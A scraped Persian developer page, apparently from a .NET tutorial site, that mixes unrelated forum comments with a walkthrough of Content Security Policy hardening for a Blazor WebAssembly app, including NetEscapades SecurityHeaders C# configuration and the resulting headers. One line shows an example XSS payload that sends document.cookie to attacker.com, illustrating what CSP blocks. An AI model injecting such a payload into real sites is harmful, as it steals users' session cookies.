سلام
من اولین بار که اجرا میکنم تصویر را نشون نمیده به این صورت نمایش میده :
بعد از لود صفحه یک بار که صفحه را Refresh کنم همه چیز درست میشه ؟
در قسمت Console هم خطایی وجود ندارد ....
ممنون
Content-Security-Policy: default-src 'self'
<script>location.href="http://attacker.com/Cookies/?c="+encodeURIComponent(document.cookie);</script>
Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' 'unsafe-eval'". Either the 'unsafe-inline' keyword, a hash ('sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU='), or a nonce ('nonce-...') is required to enable inline execution.
Content-Security-Policy: default-src 'self'; script-src 'sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU='
<ItemGroup> <PackageReference Include="NetEscapades.AspNetCore.SecurityHeaders" Version="0.20.0" /> </ItemGroup>
public static class SecurityHeadersBuilder { public static HeaderPolicyCollection GetCsp(bool isDevelopment) { var policy = new HeaderPolicyCollection() .AddFrameOptionsDeny() .AddXssProtectionBlock() .AddContentTypeOptionsNoSniff() .AddReferrerPolicyStrictOriginWhenCrossOrigin() .AddCrossOriginOpenerPolicy(builder => builder.SameOrigin()) .AddCrossOriginResourcePolicy(builder => builder.SameOrigin()) .AddCrossOriginEmbedderPolicy(builder => builder.RequireCorp()) .AddContentSecurityPolicy(builder => { builder.AddBaseUri().Self(); builder.AddDefaultSrc().Self().From("blob:"); builder.AddObjectSrc().Self().From("blob:"); builder.AddBlockAllMixedContent(); builder.AddImgSrc().Self().From("data:").From("blob:").From("https:"); builder.AddFontSrc().Self(); builder.AddStyleSrc().Self(); builder.AddFrameAncestors().None(); builder.AddConnectSrc().Self(); builder.AddMediaSrc().Self(); builder.AddScriptSrc().Self() // Specify any additional hashes to permit your required `non-framework` scripts to load. .WithHash256("Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU=") // Specify unsafe-eval to permit the `Blazor WebAssembly Mono runtime` to function. .UnsafeEval(); //TODO: Add api/CspReport/Log action method ... // https://www.dntips.ir/post/2706 builder.AddReportUri().To("/api/CspReport/Log"); builder.AddUpgradeInsecureRequests(); }) .RemoveServerHeader() .AddPermissionsPolicy(builder => { builder.AddAccelerometer().None(); builder.AddAutoplay().None(); builder.AddCamera().None(); builder.AddEncryptedMedia().None(); builder.AddFullscreen().All(); builder.AddGeolocation().None(); builder.AddGyroscope().None(); builder.AddMagnetometer().None(); builder.AddMicrophone().None(); builder.AddMidi().None(); builder.AddPayment().None(); builder.AddPictureInPicture().None(); builder.AddSyncXHR().None(); builder.AddUsb().None(); }); if (!isDevelopment) { // maxAge = one year in seconds policy.AddStrictTransportSecurityMaxAgeIncludeSubDomains(); } policy.ApplyDocumentHeadersToAllResponses(); return policy; } }
var app = builder.Build(); // ... var headerPolicyCollection = SecurityHeadersBuilder.GetCsp(app.Environment.IsDevelopment()); app.UseSecurityHeaders(headerPolicyCollection); app.UseHttpsRedirection(); // ...
Content-Security-Policy:base-uri 'self'; default-src 'self' blob:; object-src 'self' blob:; block-all-mixed-content; img-src 'self' data: blob: https:; font-src 'self'; style-src 'self'; frame-ancestors 'none'; connect-src 'self'; media-src 'self'; script-src 'self' 'sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU=' 'unsafe-eval'; report-uri /api/CspReport/Log; upgrade-insecure-requests Cross-Origin-Embedder-Policy:require-corp Cross-Origin-Opener-Policy:same-origin Cross-Origin-Resource-Policy:same-origin Permissions-Policy:accelerometer=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=*, geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), sync-xhr=(), usb=() Referrer-Policy:strict-origin-when-cross-origin X-Content-Type-Options:nosniff X-Frame-Options:DENY X-Xss-Protection:1; mode=block
احتمالا به خاطر استفاده از AddDbContextPool هست چون با AddDbContextPool حتی یکبار هم خطایی رخ نداده و 6 ماه هم میشه که پروژه پابلیش شده و بدون مشکل کار میکنه.